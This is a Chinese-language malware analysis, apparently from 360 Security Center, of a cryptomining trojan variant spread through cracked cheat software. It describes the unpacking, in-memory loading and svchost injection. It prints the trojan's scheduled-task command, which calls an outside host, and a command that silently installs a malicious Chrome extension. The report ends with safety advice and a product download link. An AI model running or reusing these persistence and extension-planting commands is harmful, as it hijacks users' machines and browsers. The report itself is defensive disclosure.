一:木马概述
360安全中心近期监控到WinstarNssmMiner3变种非常活跃,日拦截量超过三万,该木马主要是通过各种破解外挂传播,建议用户下载各种软件时候尽量到官方网站下载,不要轻易下载各种来历不明软件。
二:木马分析
新的木马变种不再使用MSI打包,而使用Inno打包,并将unzip.exe文件改名成q.exe来伪装自己。
安装包释放文件后调用q.exe -o -P pwzx aa.zip命令来解压出木马。
解压缩出来的Uninstall.dll文件是木马DLL的Loader程序,_locale.nls是加密后的核心木马程序,Loader会对其进行解密并内存加载执行。
内存解密_locale.nls出PE并加载:
内存加载解密后的木马进行挖矿,新的木马变种还使用了VMP进行代码保护:
然后跟之前版本类似木马为了常驻于用户电脑会添加一个计划任务:
/create /tn "{0621BB95-A70B-9841-162F-62C578D8E38F}" /tr "'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' http://mod-blog.com/cl/?guid=blo7phv3xl7etbeqpt8xv1yofjgnrxds&prid=1&pid=6_1308_5758" /sc minute /mo 40 /f
然后还会添加Chrome恶意插件
%UserProfile%\AppData\Local\Temp\85C2E101\DBBKGILOKAOHNHHEANPIBGKLMHMKNHMM""%UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbbkgilokaohnhheanpibgklmhmknhmm" /e /i /h /c /r /y
该插件信息为:
注入svchost.exe进程 中挖矿,svchost.exe CPU占用极高
木马安装包VT检出情况:
三:安全提醒
近期挖矿木马非常活跃,让人防不胜防。建议用户及时打上系统和第三方补丁,发现电脑卡慢等异常情况时候使用安全软件扫描,同时注意保证安全软件的常开以进行防御一旦受诱导而不慎中招,尽快使用360安全卫士查杀清除木马
此外,360安全卫士已经推出了挖矿木马防护功能,
全面防御从各种渠道入侵的挖矿木马。用户开启了该功能后,360安全卫士将会实时拦截各类挖矿木马的攻击,为用户计算机安全保驾护航。
下载地址:
http://down.360safe.com/inst.exe